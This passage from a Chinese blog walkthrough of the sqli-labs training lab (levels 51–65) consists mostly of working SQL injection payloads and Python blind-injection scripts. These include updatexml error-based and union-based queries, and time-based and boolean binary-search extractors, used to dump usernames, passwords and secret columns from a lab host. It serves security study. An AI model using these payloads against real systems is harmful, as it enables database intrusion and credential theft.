        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-51

时间盲注，堆叠注入，报错注入都行，和前面的差不多了

?sort=0' and updatexml(1,concat(1,(select database())),1)--+
?sort=0' and updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema='security')),1)--+ 查看表
?sort=0' and updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='users')),1)--+
?sort=0' and updatexml(1,substr(concat(1,(select group_concat(username,0x3e,password) from users)),1,32),1)--+ 查看内容

less-52

时间盲注，堆叠注入。

import requests

url = 'http://192.168.3.39:84/Less-52/?sort=0||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-53

时间盲注，堆叠注入。

import requests

url = 'http://192.168.3.39:84/Less-53/?sort=0\'||'
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select group_concat(column_name) from information_schema.columns where table_name="users"),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        payload = 'if(ascii(substr((select group_concat(username,0x3e,password) from users),%d,1))>%d,sleep(2),0)--+'%(i,mid)
        try:
            r = requests.get(url + payload, timeout=1)
            tail = mid
        except Exception as e:
            head = mid + 1

    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-54

和前面的类似，但是有次数限制，首先应该测闭合方式，最常见的就是引号闭合。然后这题开始数据库、表、字段、内容都可能不一样，一步步尝试获取。

?id=0' union select 1,2,database()--+    查看数据库
?id=0' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   查看表
?id=0' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='GAC1FTFF3I'--+  查看字段
?id=0' union select 1,2,group_concat(sessid,0x3e,secret_SBM0,0x3e,tryy) from GAC1FTFF3I--+  查看内容。

less-55

同less-54。

?id=0) union select 1,2,database()--+    查看数据库
?id=0) union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   查看表
?id=0) union select 1,2,group_concat(column_name) from information_schema.columns where table_name='F2T4PO39NZ'--+  查看字段
?id=0) union select 1,2,group_concat(sessid,0x3e,secret_9SQJ,0x3e,tryy) from F2T4PO39NZ--+  查看内容。

less-56

同less-54。

?id=0') union select 1,2,database()--+    查看数据库
?id=0') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   查看表
?id=0') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='F2T4PO39NZ'--+  查看字段
?id=0') union select 1,2,group_concat(sessid,0x3e,secret_9SQJ,0x3e,tryy) from F2T4PO39NZ--+  查看内容。

less-57

同less-54。

?id=0" union select 1,2,database()--+    查看数据库
?id=0" union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+   查看表
?id=0" union select 1,2,group_concat(column_name) from information_schema.columns where table_name='BJGSBTXAB5'--+  查看字段
?id=0" union select 1,2,group_concat(sessid,0x3e,secret_5M6O,0x3e,tryy) from BJGSBTXAB5--+  查看内容。

less-58

报错注入，和上面差不多，但次数限制5，试闭合可能就没了。所以可以直接从表开始查起，不查数据库，因为可以不需要。

?id=0'||updatexml(1,concat(1,database()),2)--+    查看数据库
?id=0'||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   查看表
?id=0'||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='MGJP2WHM3Y')),2)--+  查看字段
?id=0'||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_24RK,0x3e,tryy) from MGJP2WHM3Y),1,32)),2)--+  查看内容。

less-59

同less-58。

?id=0||updatexml(1,concat(1,database()),2)--+    查看数据库
?id=0||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   查看表
?id=0||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='LT7KPWCFHN')),2)--+  查看字段
?id=0||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_ARJK,0x3e,tryy) from LT7KPWCFHN),1,32)),2)--+  查看内容。

less-60

同less-58。

?id=0")||updatexml(1,concat(1,database()),2)--+    查看数据库
?id=0")||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   查看表
?id=0")||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='H3TPPX9L6M')),2)--+  查看字段
?id=0")||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_YEKB,0x3e,tryy) from VFQELTLHRF),1,32)),2)--+  查看内容。

less-61

同less-58。

?id=0'))||updatexml(1,concat(1,database()),2)--+    查看数据库
?id=0'))||updatexml(1,concat(1,(select group_concat(table_name) from information_schema.tables where table_schema=database())),2)--+   查看表
?id=0'))||updatexml(1,concat(1,(select group_concat(column_name) from information_schema.columns where table_name='H3TPPX9L6M')),2)--+  查看字段
?id=0'))||updatexml(1,concat(1,substr((select group_concat(sessid,0x3e,secret_90EI,0x3e,tryy) from H3TPPX9L6M),1,32)),2)--+  查看内容。

less-62

盲注，当然能布尔就布尔。

import requests

url = "http://192.168.3.39:84/Less-62/?id=0')||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="BVOP9BQ5Y1")),%d,1))>%d,1,0)--+'%(i,mid)
        payload = 'if(ascii(substr((select(group_concat(secret_1BQG))from(BVOP9BQ5Y1)),%d,1))>%d,1,0)--+'%(i,mid)
        r = requests.get(url + payload)
        if "Angelina" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-63

同less-62，先点右上角的Reset the callengle！。因为有次数限制，先重置一下

import requests

url = "http://192.168.3.39:84/Less-63/?id=0'||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="1TR0A8MPVK")),%d,1))>%d,1,0)--+'%(i,mid)
        payload = 'if(ascii(substr((select(group_concat(secret_A7M1))from(1TR0A8MPVK)),%d,1))>%d,1,0)--+'%(i,mid)
        r = requests.get(url + payload)
        if "Angelina" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-64

同less-63。

import requests

url = "http://192.168.3.39:84/Less-64/?id=0))||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="R4BFEIU6PA")),%d,1))>%d,1,0)--+'%(i,mid)
        payload = 'if(ascii(substr((select(group_concat(secret_QVX3))from(R4BFEIU6PA)),%d,1))>%d,1,0)--+'%(i,mid)
        r = requests.get(url + payload)
        if "Angelina" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

less-65

同less-63。

import requests

url = "http://192.168.3.39:84/Less-65/?id=0\")||"
result = ''
i = 0

while True:
    i = i + 1
    head = 32
    tail = 127

    while head < tail:
        mid = (head + tail) >> 1
        #payload = 'if(ascii(substr(database(),%d,1))>%d,1,0)||(\'0'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),%d,1))>%d,1,0)--+'%(i,mid)
        #payload = 'if(ascii(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name="2WU00QD714")),%d,1))>%d,1,0)--+'%(i,mid)
        payload = 'if(ascii(substr((select(group_concat(secret_3IE7))from(2WU00QD714)),%d,1))>%d,1,0)--+'%(i,mid)
        r = requests.get(url + payload)
        if "Angelina" in r.text:
            head = mid + 1
        else:
            tail = mid
    if head != 32:
        result += chr(head)
    else:
        break
    print(result)

三、结束

注入方法就那几种，在比赛时，一是找注入点，而是绕过过滤处理。

风过江南乱

关注

1
点赞
踩
5

收藏

觉得还不错? 一键收藏
0
评论
sqli-labs靶场

一、前言虽然之前刚开始学的时候已经打过一边，但当时可能懵懵懂懂，现在回过头来再过一遍。用linux虚拟机docker直接一键，访问虚拟机ip80端口即可。docker search sqli-labs 搜索镜像docker pull acgpiano/sqli-labs 拉取镜像docker run -dt --name sqli -p 80:80 -p 13306:3306 --rm acgpiano/sqli-labs 运行镜像。建议都用手敲一遍。熟悉相关函数和指令。本文可能
复制链接

扫一扫